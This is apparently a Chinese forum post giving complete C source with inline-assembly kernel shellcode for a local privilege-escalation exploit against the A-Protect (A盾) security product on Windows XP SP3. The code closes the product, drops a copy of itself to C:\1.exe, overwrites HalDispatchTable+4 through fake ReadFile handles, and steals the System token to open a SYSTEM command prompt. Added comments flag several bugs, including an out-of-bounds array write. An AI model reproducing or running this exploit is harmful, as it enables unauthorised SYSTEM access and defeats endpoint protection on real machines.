环境:Windows XP SP3 虚拟机
1.打开A-Protect.exe
2.等待A-Protect.exe显示完系统进程信息
3.编译如下代码，双击运行后会结束A-Protect.exe，然后得到一个SYSTEM的CMD
#include <Windows.h>
// Per-module record as returned by NtQuerySystemInformation(SystemModuleInformation, class 11).
// Mirrors the undocumented ntdll layout; this file reads only ImageBase, FullPathName and
// OffsetToFileName from the first entry.
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase; // kernel-mode load address of the module (used below as the ntoskrnl base)
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName; // index into FullPathName where the bare file name begins
UCHAR FullPathName[ 256 ]; // NUL-terminated ANSI path
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
// Buffer header for SystemModuleInformation: a count followed by a variable number of entries.
// Modules[1] mirrors the Windows definition (the C99 spelling would be Modules[]); only entry 0
// is consumed here. WinMain passes sizeof(RTL_PROCESS_MODULES), which is too small for the real
// list, expects STATUS_INFO_LENGTH_MISMATCH, and then reads Modules[0] anyway — an assumption
// that the kernel partially fills the buffer, which the code never checks.
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
// ntdll exports are resolved at runtime with GetProcAddress in WinMain. All prototypes are x86
// __stdcall with pointers and handles flattened to ULONG, so this file is 32-bit only.
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory; // resolved in WinMain but never called
NtQuerySystemInformation_ NtQuerySystemInformation;
// Kernel-mode addresses computed in WinMain (user-mode export address rebased onto the kernel's
// real load address). ShellCode calls through these globals indirectly, hence file scope.
ULONG WriteToHalDispatchTable, ZwOpenProcess, ZwOpenProcessTokenEx, ZwDuplicateToken, ZwSetInformationProcess;
// SYSTEMCID: a CLIENT_ID with UniqueProcess = 4 (the System process on XP) and UniqueThread = 0.
// ObjectAttributes: six zero-initialised ULONGs standing in for a 24-byte x86 OBJECT_ATTRIBUTES,
// Length field included (so it is 0, not sizeof(OBJECT_ATTRIBUTES)).
ULONG SYSTEMCID[2]={4,0}, ObjectAttributes[6];
// Out-parameters written by ShellCode while it runs in kernel mode. Their user-mode addresses are
// pushed as arguments, so the payload depends on this process's address space being current.
HANDLE hSystemProc, hTokenHandle, hNewTokenHandle;
// Kernel-mode payload. WinMain copies its first 200 bytes into an RWX page and intends for the
// kernel to reach it through the overwritten HalDispatchTable+4 slot. It is a naked function:
// no compiler prologue/epilogue, so pushad/pushfd and the matching pops are the only register
// preservation. It duplicates the System process's primary token onto the calling process
// (token theft). Each Zw* call goes through a global holding a kernel address; the first three
// bail out on any non-zero NTSTATUS, the final ZwSetInformationProcess result is not checked.
void _declspec(naked) ShellCode()
{
__asm
{
pushad // preserve all general registers and flags for the interrupted kernel caller
pushfd
// ZwOpenProcess(&hSystemProc, 0x0400 (PROCESS_QUERY_INFORMATION), &ObjectAttributes, &SYSTEMCID)
push offset SYSTEMCID
push offset ObjectAttributes
push 0x0400
push offset hSystemProc
call ZwOpenProcess // indirect call through the ULONG global
cmp eax,0
jnz exit0
// ZwOpenProcessTokenEx(hSystemProc, TOKEN_ALL_ACCESS, 0x200 (OBJ_KERNEL_HANDLE), &hTokenHandle)
push offset hTokenHandle
push 0x200
push TOKEN_ALL_ACCESS
// the trailing ';' on the next line opens an empty assembler comment; harmless
push hSystemProc;
call ZwOpenProcessTokenEx
cmp eax,0
jnz exit0
// ZwDuplicateToken(hTokenHandle, TOKEN_ALL_ACCESS, NULL, FALSE, TokenPrimary, &hNewTokenHandle)
push offset hNewTokenHandle
push TokenPrimary
push 0
push 0
push TOKEN_ALL_ACCESS
push hTokenHandle
call ZwDuplicateToken
cmp eax,0
jnz exit0
// ZwSetInformationProcess(-1 (current process), 9 (ProcessAccessToken), &hNewTokenHandle, 8)
// The class expects an 8-byte PROCESS_ACCESS_TOKEN {Token, Thread}; only the 4-byte
// hNewTokenHandle is declared, so the Thread field is whatever the linker placed after it —
// C gives no layout guarantee for adjacent globals.
push 8
push offset hNewTokenHandle
push 9
push 0xFFFFFFFF
call ZwSetInformationProcess
exit0:
popfd
popad
ret
}
}
// Size of the copy written to C:\1.exe by the parent branch of WinMain. The name suggests the
// byte size of A-Protect.exe, so the dropped copy is padded to exactly that length; the page
// does not say why the length matters.
#define AProcess_Size 0x683800
WCHAR pSelfEXEPath[MAX_PATH]; // path of the running executable, filled by GetModuleFileName
// Static, zero-filled staging buffer for the self-copy; bytes past the real file size are
// written out as zeros. Its size is never compared against the file size read into it.
UCHAR pBuffer[AProcess_Size];
// 5-byte array handed to the first pseudo-handle ReadFile in the child branch, which asks for
// 8 bytes — an over-run if that call were ever serviced as a real read.
char pSafe[] = "Safe";
// Entry point; the raw command line selects one of two roles.
//   "Son"  — the dropped copy at C:\1.exe. Resolves kernel addresses, issues two ReadFile calls
//            on fixed pseudo-handle values carrying the overwrite target HalDispatchTable+4
//            (presumably intercepted by the product's driver — the page leaves this implicit),
//            triggers that slot via NtQueryIntervalProfile and spawns cmd.exe, which inherits
//            whatever token ShellCode installed.
//   other  — the original binary. Closes the A-Protect window, writes a copy of itself to
//            C:\1.exe padded to AProcess_Size, and launches it with the command line "Son".
// Build assumptions: UNICODE (wide literals passed to non-A APIs) and 32-bit MSVC (inline asm,
// pointer<->ULONG casts). Most Win32 return values in the child branch are unchecked, and the
// early `return 0` paths leak the handles opened before them; process exit reclaims them.
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
HMODULE ntdll;
ntdll = GetModuleHandle( L"ntdll.dll" ); // unused: shadowed by the block-scope ntdll below
if ( _stricmp(GetCommandLineA(),"Son") == 0 ) // the CreateProcess below passes exactly L"Son" as lpCommandLine
{
HMODULE ntdll = GetModuleHandle( L"ntdll.dll" );
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" ); // resolved, never used
NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return 0;
// Query the loaded-module list once; only entry 0 (assumed to be ntoskrnl) is used.
ULONG status, NtoskrnlBase;
RTL_PROCESS_MODULES module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL); // 11 == SystemModuleInformation
// The one-entry buffer is too small for the full list, so STATUS_INFO_LENGTH_MISMATCH is the
// expected outcome; the code then relies on Modules[0] having been filled anyway, which the
// documented contract does not promise.
if ( status != 0xC0000004 ) // STATUS_INFO_LENGTH_MISMATCH
return 0;
NtoskrnlBase = (ULONG)module.Modules[0].ImageBase; // kernel load address of entry 0
// Map ntoskrnl.exe into this process as an ordinary module (by bare file name, via the loader
// search path) so its exports can be resolved with GetProcAddress.
HMODULE ntoskrnl;
ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
if ( ntoskrnl == NULL )
return 0;
// Rebase: user-mode export address - user-mode base + kernel base == kernel address.
WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4; // HalDispatchTable+4: the slot to overwrite
ZwOpenProcess = (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
ZwOpenProcessTokenEx = (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcessTokenEx") - (ULONG)ntoskrnl + NtoskrnlBase;
ZwDuplicateToken = (ULONG)GetProcAddress(ntoskrnl,"ZwDuplicateToken") - (ULONG)ntoskrnl + NtoskrnlBase;
ZwSetInformationProcess = (ULONG)GetProcAddress(ntoskrnl,"ZwSetInformationProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
// Original comment: "from here on, everyone has their own tricks" — the author does not explain
// the next two ReadFile calls. Neither is a genuine read: 0x18881111 / 0x18881191 are not
// handles this process owns, the first asks for 8 bytes into the 5-byte pSafe, and passing NULL
// for both lpNumberOfBytesRead and lpOverlapped is invalid for a real ReadFile. Results ignored.
ReadFile((HANDLE)0x18881111,pSafe,8,NULL,NULL);
// RWX page that receives a copy of ShellCode.
LPVOID MyAddress = VirtualAlloc(NULL,0x1000,MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if (MyAddress==NULL)
return 0;
memset(MyAddress,0,0x1000);
// Request block handed to the second ReadFile; its address is smuggled through the
// nNumberOfBytesToRead argument with a NULL buffer. Slot 6 holds the payload page's address
// and slot 7 the overwrite target named by the original comment; how the other side
// interprets the block is not on the page.
ULONG Length[7]={0};
Length[0]=-1; // -1 converted to ULONG: 0xFFFFFFFF (well-defined unsigned conversion)
Length[6]=(ULONG)MyAddress;
Length[7]=WriteToHalDispatchTable; // BUG: index 7 is one past the end of Length[7] — out-of-bounds write, undefined behaviour in C
ReadFile((HANDLE)0x18881191,0,(ULONG)Length,NULL,NULL);
memcpy( MyAddress, ShellCode, 200 ); // 200 is an assumed upper bound on the payload's size; not checked
// Trigger: NtQueryIntervalProfile dispatches through HalDispatchTable+4 (the well-known
// HalQuerySystemInformation slot), so the kernel calls the copied ShellCode. `status` is
// reused as the out-parameter. Then spawn cmd.exe, which inherits this process's primary
// token — SYSTEM if ShellCode succeeded.
NtQueryIntervalProfile( 2, &status );
STARTUPINFO si;
PROCESS_INFORMATION pii;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pii, sizeof(pii) );
CreateProcess( L"C:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii ); // result unchecked; pii handles never closed
}
else
{
// Parent role: ask the A-Protect main window to close, then post Enter to the window that
// appears afterwards (presumably a confirmation prompt — inferred only from its title).
HWND hWnd;
hWnd = FindWindow(NULL,L"A盾电脑防护 LE 2012-0.3.1");
if ( hWnd == NULL )
return 0;
PostMessage(hWnd,WM_CLOSE,0,0);
for ( int i = 0; i < 10; i++ ) // poll once a second for up to ~10 s
{
Sleep(1000);
hWnd = FindWindow(NULL,L"A盾电脑防护");
if ( hWnd != NULL )
{
PostMessage(hWnd,WM_KEYDOWN,VK_RETURN,0);
break;
}
}
// Copy this executable to C:\1.exe, padded to AProcess_Size bytes.
GetModuleFileName(NULL,pSelfEXEPath,MAX_PATH);
HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if ( hSelfFile == INVALID_HANDLE_VALUE )
return 0;
ULONG uFileSize = GetFileSize(hSelfFile,NULL);
if ( uFileSize == INVALID_FILE_SIZE )
return 0;
ULONG dwResult;
// No check that uFileSize <= AProcess_Size: a build larger than 0x683800 bytes overflows pBuffer.
if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
return 0;
HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hTargetFile == INVALID_HANDLE_VALUE)
return 0;
// Writes AProcess_Size bytes, not uFileSize: the tail is the zero-initialised remainder of pBuffer.
if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
return 0;
CloseHandle(hSelfFile);
CloseHandle(hTargetFile);
// Launch the copy with "Son" as its entire command line, selecting the child role above.
STARTUPINFO si;
PROCESS_INFORMATION pii;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pii, sizeof(pii) );
CreateProcess( L"C:\\1.exe", L"Son", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
}
return 0;
}
不玩了，学习A盾开源的代码去了。